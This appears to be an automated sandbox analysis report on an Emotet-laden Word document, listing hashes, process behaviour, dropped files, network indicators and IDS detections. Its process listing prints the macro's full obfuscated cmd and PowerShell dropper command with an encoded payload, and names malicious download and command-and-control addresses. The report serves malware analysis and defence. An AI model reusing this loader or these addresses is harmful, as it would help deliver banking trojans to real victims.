analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

PAY #136FJUT.doc

Full analysis: https://app.any.run/tasks/59e0e265-470f-4271-beeb-f44dd3ebfd24
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2018, 08:49:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Owen-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 8 07:55:00 2018, Last Saved Time/Date: Thu Nov 8 07:55:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

696BCA0E525884C2707789BDEA4A9020

SHA1:

19331E351FC0E9730D0DF4F9000EECEA8CE0FC8A

SHA256:

9243685DA3DEFDE3AD5297959C49E9D862D86B435EB659CF5DE203108EB875A6

SSDEEP:

768:I/rVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9OLKXeIVMOwS:I/rocn1kp59gxBK85fBt+a9Os

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2816)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2816)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 820)
    • Application was dropped or rewritten from another process

      • lpiograd.exe (PID: 2532)
      • 997.exe (PID: 2964)
      • 997.exe (PID: 3420)
      • lpiograd.exe (PID: 996)
    • EMOTET was detected

      • lpiograd.exe (PID: 996)
    • Changes the autorun value in the registry

      • lpiograd.exe (PID: 996)
    • Connects to CnC server

      • lpiograd.exe (PID: 996)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • CMD.exe (PID: 2484)
    • Creates files in the user directory

      • powershell.exe (PID: 820)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 820)
      • 997.exe (PID: 3420)
    • Starts itself from another location

      • 997.exe (PID: 3420)
    • Connects to unusual port

      • lpiograd.exe (PID: 996)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2816)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2816)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:08 07:55:00
CreateDate: 2018:11:08 07:55:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Owen-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
4
Suspicious processes
3

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 997.exe no specs 997.exe lpiograd.exe no specs #EMOTET lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
2816"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\PAY #136FJUT.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2484CMD CmD /c "SEt CwymA= ^& ((VAriable '*mdr*').nAmE[3,11,2]-JOIn'')(nEw-oBJECt systEM.Io.STreAMReaDer(( nEw-oBJECt iO.comPReSsIoN.deFLaTeSTreaM([sYsTEm.IO.MeMORysTream] [sySTEM.cONVerT]::frombaSe64STrIng('NZBdS8MwGIX/Si8C2ahNLucWClOHrgpCHTgm3qTtq61rPhbeNm6l/9212NvzHB44h5hNGWvwkcl+IMfgFZDtIXuoK9AoSPKkY1oi2hXn2Eoniwuw3Ch+u/5PpcPLUZ5tKZ2S+XmATDZ8d5oKReONZhqQe2sjaS1/mZCqVCZdoxo1Oj9Sl74d0sWEvfcsK5AZ980yx+/RvD9TtrN1hTO6pnNB7k5FEAd0uVxQQba+iQnodoWgbEg/aTjwkDL4BSq+jAOZlzNy2G+DSgfDtHmH7tyR6wVsY7yujSweqxrGzk0wCOci0a05QpRcpWMisqvnKPpcYl52ff8H' ),[SYStEM.io.coMPReSsiON.comPReSSiONmOdE]::dEcoMPREsS ) ), [SYsTEM.TEXT.EnCoDINg]::Ascii)).rEadtoEnD()&& pOWerSHELl ${e`X`ecu`T`ionCon`TexT}.\"I`NVo`KEcoM`MANd\".( \"{2}{1}{3}{0}\" -f 't','KE','inVo','ScRiP' ).Invoke( ( ^& (\"{1}{0}{2}\"-f'-','Get','ItEM') (\"{2}{0}{1}\"-f 'n','V:cwYma','e')).\"vA`lue\" )" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
820pOWerSHELl ${e`X`ecu`T`ionCon`TexT}.\"I`NVo`KEcoM`MANd\".( \"{2}{1}{3}{0}\" -f 't','KE','inVo','ScRiP' ).Invoke( ( & (\"{1}{0}{2}\"-f'-','Get','ItEM') (\"{2}{0}{1}\"-f 'n','V:cwYma','e')).\"vA`lue\" )C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2964"C:\Users\admin\AppData\Local\Temp\997.exe" C:\Users\admin\AppData\Local\Temp\997.exepowershell.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Exit code:
0
Version:
2
3420"C:\Users\admin\AppData\Local\Temp\997.exe"C:\Users\admin\AppData\Local\Temp\997.exe
997.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Exit code:
0
Version:
2
2532"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe997.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Exit code:
0
Version:
2
996"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Version:
2
Total events
1 672
Read events
1 258
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2816WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR949A.tmp.cvr
MD5:
SHA256:
820powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F5ORQ48IAMFS2GXFJH14.temp
MD5:
SHA256:
2816WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$Y #136FJUT.docpgc
MD5:2D4E468D756F91CA1BC93D18C3F91FC1
SHA256:01A73C84F4101616E8B996447543F6CC840784C02859F0393E3C619715D1AEB2
2816WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F12123BE3FC217E2B306FA7D3C1EF718
SHA256:3C767FE8FEA3E2CCF71ADDB57BE518569265124015C279DC07A0A438B8E20F32
820powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
820powershell.exeC:\Users\admin\AppData\Local\Temp\997.exeexecutable
MD5:66A95C8A78DE4B39957623C22C86497C
SHA256:9BB439C20499AD22C4F75CE8F1CD69D147DA5DC0C55C2DC4DCDBDFFF704B295E
3420997.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:66A95C8A78DE4B39957623C22C86497C
SHA256:9BB439C20499AD22C4F75CE8F1CD69D147DA5DC0C55C2DC4DCDBDFFF704B295E
820powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da052.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
4
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
996
lpiograd.exe
GET
201.171.29.119:80
http://201.171.29.119/whoami.php
MX
malicious
996
lpiograd.exe
GET
200
136.56.103.201:80
http://136.56.103.201/
US
binary
866 Kb
malicious
820
powershell.exe
GET
200
143.95.236.37:80
http://tvaradze.com/8/
US
executable
132 Kb
malicious
996
lpiograd.exe
GET
200
136.56.103.201:80
http://136.56.103.201/
US
binary
148 b
malicious
820
powershell.exe
GET
301
143.95.236.37:80
http://tvaradze.com/8
US
html
230 b
malicious
996
lpiograd.exe
GET
200
50.100.215.149:50000
http://50.100.215.149:50000/whoami.php
CA
text
15 b
malicious
996
lpiograd.exe
GET
200
50.100.215.149:50000
http://50.100.215.149:50000/
CA
binary
148 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
996
lpiograd.exe
136.56.103.201:80
Google Fiber Inc.
US
malicious
820
powershell.exe
143.95.236.37:80
tvaradze.com
Colo4, LLC
US
suspicious
996
lpiograd.exe
201.171.29.119:80
Uninet S.A. de C.V.
MX
malicious
996
lpiograd.exe
50.100.215.149:50000
Bell Canada
CA
malicious

DNS requests

Domain
IP
Reputation
tvaradze.com
  • 143.95.236.37
malicious

Threats

PID
Process
Class
Message
820
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
820
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
820
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
820
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
996
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
996
lpiograd.exe
A Network Trojan was detected
SC SPYWARE Trojan-Banker.Win32.Emotet
996
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3 ETPRO signatures available at the full report
No debug info